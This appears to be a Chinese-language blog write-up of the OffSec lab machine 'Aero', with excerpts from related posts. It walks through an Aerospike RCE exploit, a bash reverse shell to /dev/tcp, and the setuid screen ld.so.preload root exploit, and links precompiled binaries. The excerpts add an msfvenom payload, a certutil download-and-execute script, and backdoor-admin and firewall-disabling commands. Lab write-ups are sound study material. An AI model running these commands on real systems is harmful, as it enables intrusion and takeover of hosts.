Challenge 4 - Aero

-

Challenge 4 - Aero

└─$ rustscan -a 192.168.205.143 --scripts none --ulimit 5000 | tee rustscan




└─$ sudo nmap -sVC -p 21,22,80,81,443,3000,3001,3003,3306,5432 192.168.205.143 | tee nmap



當中較為特別的是 3000、3001、3003,依據這一篇文章

https://docs.aerospike.com/server/operations/plan/network 判定應為 Aerospike

開放的典型連接埠:

3000 -“服務”端口,處理客戶端請求和回應。

3001 -“fabric”端口,處理伺服器節點到節點的通訊。

3002 -“心跳”連接埠 -(可選)用於心跳 TCP 訊息。

3003 -“info”端口,這是一個可用於 Aerospike info 命令的 telnet 連接埠。

3004 - 'xdr' 端口,由舊版 xdr 守護程序用來與主 Aerospike 守護程序進行通訊。



持續枚舉後透過 gobuster 在這個網址

"http://192.168.205.143/api/heartbeat.php" 可以清楚看到 Aerospike 字眼







└─$ searchsploit Aerospike,結果只有一個 49067 ,那就直接試試看吧                                                  





└─$ searchsploit -m 49067




直接先執行看看 └─$ python3 49067.py

錯誤訊息是 ModuleNotFoundError: No module named 'aerospike'





看看內容 https://www.exploit-db.com/exploits/49067 

寫 # requires aerospike package from pip

那就安裝吧 └─$ sudo pip3 install aerospike




再跑一次看到範例為 49067.py --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000



就改執行 49067.py --ahost 192.168.205.143 --pythonshell --lhost=192.168.45.232 --lport=4444

python3 49067.py --ahost 192.168.205.143 --pythonshell --lhost=192.168.45.232 --lport=443

python3 49067.py --ahost 192.168.205.143 --netcatshell --lhost=192.168.45.232 --lport=443  

全部不行.......GG,都寫 instance is patched

改 Metasploit 試試看 └─$ sudo msfconsole -q; search aerospike; use 0




show options 改好如下,注意 LPORT 用 443




進去了,先拿第一個 flag 吧




看一下 tty 不是 tty,快速 tty 指令下下去 "script -c /bin/bash -q /dev/null",再 tty 一次發現是 tty 了




再建一個 Session,/bin/bash -l > /dev/tcp/192.168.45.178/3306 0<&1 2>&1 &




後來測試 GitHub 的 py 就成功了,https://github.com/b4ny4n/CVE-2020-13151/tree/master

要記得一併下載 poc.lua 檔案放在同一個路徑下




執行 └─$ python3 49067.py --ahost 192.168.205.143 --pythonshell --lhost=192.168.45.232 --lport=3000




reverse shell 進來了,一樣快速 tty 指令下下去 "script -c /bin/bash -q /dev/null"





接著是提權,標準 Linux 列舉,下載 linpeas.sh,wget http://192.168.45.183/linpeas.sh




chmod +x linpeas.sh 後執行 aero@oscp:/home/aero$ ./linpeas.sh -a | tee linpeas.txt

可以在登入目標機前先使用 script 3306.txt

接下來所有的輸出就會記錄在 kali 本機的 3306.txt 檔案裡

不需要另外將檔案傳輸回來,方便許多 (要停止就是關閉該 Terminal 或是 Ctrl+D)





注意這個 CVE :

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184

   Exposure: less probable

   Download URL: https://www.exploit-db.com/exploits/41154




選他的原因主要是這幾個字 [ Local Privilege Escalation ]




網頁上提供的範例圖片有個重點,就是檔案要放到 /tmp 底下





依照 POC 做,但靶機上面沒有 gcc 所以無法直接編譯 .sh 當中的內容

在 kali 上編譯後去靶機上執行一樣無法成功,後來是找舊一點的機器編譯後執行才成功

簡單講就是編譯好後這兩個檔案 libhax.so & rootshell,然後在靶機上下載這兩個檔案

(PS : 編譯好的檔案下載路徑 https://drive.google.com/file/d/1EqEzfnv6XRYhw47XpJ1pFcyMypA5GR-m/view?usp=sharing)

一定要放到 /tmp 路徑底下,接著執行 POC 寫的如下

cd /etc

umask 000

screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"

screen -ls

/tmp/rootshell

最後 id 看一下已經是 root 了




可以拿答案了






留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容

Challenge 8 - Poseidon(0)

-
圖片
 Challenge 8 - Poseidon(0) 最近真的新的 LAB 連發,又多了一個 Challenge 8 : Poseidon 剛好近期有空,開來看看吧,又是一個三台的組合,應該又是 AD 題組 跟前一個題組 zeus 很像,都是三台面向使用者沒有內網的機器 ping 看看,看來三台都是 Windows Rustscan 掃掃看,看來第一台一樣是 DC └─$ rustscan -a 192.168.163.161 --scripts none --ulimit 5000 | tee rustscan 第二台看來也像 DC └─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第三台,└─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第一台 161 nmap 資訊 Domain : poseidon.yzx,電腦名稱 dc01 NetBIOS_Domain_Name : poseidon 第二台 162 nmap 資訊 這一台看來是 Sub Domain 的 DC,FQDN: dc02.sub.poseidon.yzx NetBIOS_Domain_Name : sub 第三台 163 nmap 資訊 ldapsearch 161,ldapsearch -v -x -b "DC=poseidon,DC=yzx" -H "ldap://192.168.163.161" "(objectclass=*)" ldapsearch 162,ldapsearch -v -x -b "DC=sub,DC=poseidon,DC=yzx" -H "ldap://192.168.163.162" "(objectclass=*)" 預設 smbclient 列舉都爬不到東西 帶入 poseidon\guest & sub\guest SMB 也都爬不到資訊 爬看看 161 Domain 的使用者,└─$ ./kerbrute_linux_amd64...
閱讀完整內容